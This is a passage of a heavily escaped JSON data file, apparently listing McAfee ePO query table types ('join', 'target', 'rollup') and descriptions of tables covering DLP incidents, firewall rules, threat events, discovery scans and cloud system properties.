\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"jo
in\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\"
,\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"rollup\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\
\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\
\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"
join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"target\\\",\\r\\n\\t\\t\\t\\\"join\\\",\\r\\n\\t\\t\\t\\\"join\\\"\\r\\n\\t\\t]\"",
    "description": "\"[\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"McAfee Active Response Server Properties\\\",\\r\\n\\t\\t\\t\\\"Resolutions\\\",\\r\\n\\t\\t\\t\\\"Status of Discovery scans\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents Classification\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Volume properties specific to Volume from Amazon Web Service \\\",\\r\\n\\t\\t\\t\\\"Retrieves information about Threat Events sent from managed systems.\\\",\\r\\n\\t\\t\\t\\\"Label \\\",\\r\\n\\t\\t\\t\\\"Allows you to query upon log entries created by a top-level task.\\\",\\r\\n\\t\\t\\t\\\"Info of Endpoint Discovery Scans\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"Rolled up Applied Policies from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security \\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Installations\\\",\\r\\n\\t\\t\\t\\\"Tag Usage Description\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information from Groups\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Shows ePO-based DXL Client related properties\\\",\\r\\n\\t\\t\\t\\\"Active Response System\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error path\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information from Computer Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules 
Information\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"AWS VPC Flow Logs with IP Reputation\\\",\\r\\n\\t\\t\\t\\\"Table that holds the Discover Server Information\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Installed Versions Summary\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Network Communication Information \\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"User Logged Into Safe Mode\\\",\\r\\n\\t\\t\\t\\\"Automatic Registration Documents\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Endpoint System Adaptive Threat Protection Custom Properties\\\",\\r\\n\\t\\t\\t\\\"System properties specific to systems from Amazon Web Service \\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Tag Restrictions\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Device Information\\\",\\r\\n\\t\\t\\t\\\"Retrieves more detailed information on Threat Events sent from managed systems\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"MVISION EDR Properties\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.NamedNetworkDescription\\\",\\r\\n\\t\\t\\t\\\"SessionRules_table_desc\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Apply RM Policy Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Instance assessment based on Agentless Firewall\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about what policies are applied to what managed systems.\\\",\\r\\n\\t\\t\\t\\\"Web 
Post\\\",\\r\\n\\t\\t\\t\\\"Generated Key\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"Rules Information\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Source Application Information \\\",\\r\\n\\t\\t\\t\\\"Retrieves information about what policy assignments are broken in the system hierarchy.\\\",\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Email\\\",\\r\\n\\t\\t\\t\\\"discovery_incidents.classification_condition_desc\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"Web Post\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Endpoint Latest Email Storage Discovery Classifications\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"System properties specific to systems from OpenStack Cloud (Generic)\\\",\\r\\n\\t\\t\\t\\\"Capture Search Information\\\",\\r\\n\\t\\t\\t\\\"McAfee Advanced Threat Defense Properties\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Classifications\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Network)\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Properties\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Rules\\\",\\r\\n\\t\\t\\t\\\"Mobile Device Information\\\",\\r\\n\\t\\t\\t\\\"Email - Matched Recipients\\\",\\r\\n\\t\\t\\t\\\"Cloud\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Policy Applied\\\",\\r\\n\\t\\t\\t\\\"Remediation Event Description\\\",\\r\\n\\t\\t\\t\\\"Rolled up Endpoint Security Platform properties from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Retrieves data on repositories and their 
status.\\\",\\r\\n\\t\\t\\t\\\"Manual Registration Documents\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Classification\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Properties\\\",\\r\\n\\t\\t\\t\\\"Release code locked\\\",\\r\\n\\t\\t\\t\\\"Status of Discovery scans\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Retrieves information about Adaptive Threat Protection events from managed systems.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Scan \\\",\\r\\n\\t\\t\\t\\\"Network discovery additional information\\\",\\r\\n\\t\\t\\t\\\"Rolled up Applied Client Tasks from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform Custom Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about firewall rules created on client systems and in the catalog.\\\",\\r\\n\\t\\t\\t\\\"Security Incident Description\\\",\\r\\n\\t\\t\\t\\\"Web Control Events\\\",\\r\\n\\t\\t\\t\\\"Email - All Recipients\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about systems that have been added to your System Tree.\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Client Enters Bypass Mode\\\",\\r\\n\\t\\t\\t\\\"DLP Operational Events History\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control Custom Properties\\\",\\r\\n\\t\\t\\t\\\"Cases related to DLP incidents\\\",\\r\\n\\t\\t\\t\\\"Properties of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Tags\\\",\\r\\n\\t\\t\\t\\\"VMware system properties are discovered by vSphere connector.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Rules\\\",\\r\\n\\t\\t\\t\\\"DLP Discover Scan Information\\\",\\r\\n\\t\\t\\t\\\"User Groups\\\",\\r\\n\\t\\t\\t\\\"DC Discovery and Monitoring Properties\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Agent Handlers.\\\",\\r\\n\\t\\t\\t\\\"Rolled Up Endpoint Security Web Control Events from registered servers.\\\",\\r\\n\\t\\t\\t\\\"Policy Information\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall 
Custom Properties\\\",\\r\\n\\t\\t\\t\\\"Servers from which data is rolled up and used in multi-server queries.\\\",\\r\\n\\t\\t\\t\\\"Allows you to query upon log entries created by a task's subtask.\\\",\\r\\n\\t\\t\\t\\\"discovery_file_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about executables in firewall rules created on client systems.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Discovery Summary Report\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Labels\\\",\\r\\n\\t\\t\\t\\\"Evidence Replication Failed\\\",\\r\\n\\t\\t\\t\\\"Evidences\\\",\\r\\n\\t\\t\\t\\\"Registered Cloud Accounts for all Cloud vendors\\\",\\r\\n\\t\\t\\t\\\"Stores the vendor-specific properties for Cloud systems\\\",\\r\\n\\t\\t\\t\\\"Computers\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Removable Storage\\\",\\r\\n\\t\\t\\t\\\"squid.target.todolist.desc\\\",\\r\\n\\t\\t\\t\\\"Agent Statistics Information\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Endpoint Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves compliance counts over time across registered servers. This query type and its results depend on running a roll up data: Compliance History server task on this McAfee ePO server, which in turn depends on running a Run Query: Generate Compliance Event server task on each of the registered servers. These tasks create and combine the database records for this type of query. 
Click \\\\\\\"?\\\\\\\" for more information.\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan error details\\\",\\r\\n\\t\\t\\t\\\"Network Share\\\",\\r\\n\\t\\t\\t\\\"Exports (Many To Many Bridge Table)\\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"Network Appliance information \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Network discovery interactive action information \\\",\\r\\n\\t\\t\\t\\\"discovery_classification_facts_table_name\\\",\\r\\n\\t\\t\\t\\\"Contains a property with a comma-separated list of all products installed at the node.\\\",\\r\\n\\t\\t\\t\\\"File Released From Quarantine\\\",\\r\\n\\t\\t\\t\\\"Export Details\\\",\\r\\n\\t\\t\\t\\\"Shows Threat Intelligence Exchange related System Properties\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"DLP Client Exceeded Memory Limit On Load\\\",\\r\\n\\t\\t\\t\\\"Network discovery scan details\\\",\\r\\n\\t\\t\\t\\\"Network DLP Appliance Info\\\",\\r\\n\\t\\t\\t\\\"Data Inventory from DLP Discover scans\\\",\\r\\n\\t\\t\\t\\\"DLP Capture Properties\\\",\\r\\n\\t\\t\\t\\\"Tags\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\t\\\"Retrieves information about what client task assignments are broken in the system hierarchy.\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Statuses\\\",\\r\\n\\t\\t\\t\\\"Latest incidents related to data in-use/motion\\\",\\r\\n\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Policies of the DLP client sessions\\\",\\r\\n\\t\\t\\t\\\"All incidents related to data at rest (Endpoint)\\\",\\r\\n\\t\\t\\t\\\"Cloud system properties common to VMs belonging to any vendor\\\",\\r\\n\\t\\t\\t\\\"Retrieves information from Extended Computer Properties\\\",\\r\\n\\t\\t\\t\\\"fwClientRule.LocalNetworkDescription\\\",\\r\\n\\t\\t\\t\\\"System Properties\\\",\\r\\n\\t\\t\\t\\\"Retrieves summary data on systems managed by the registered servers. 
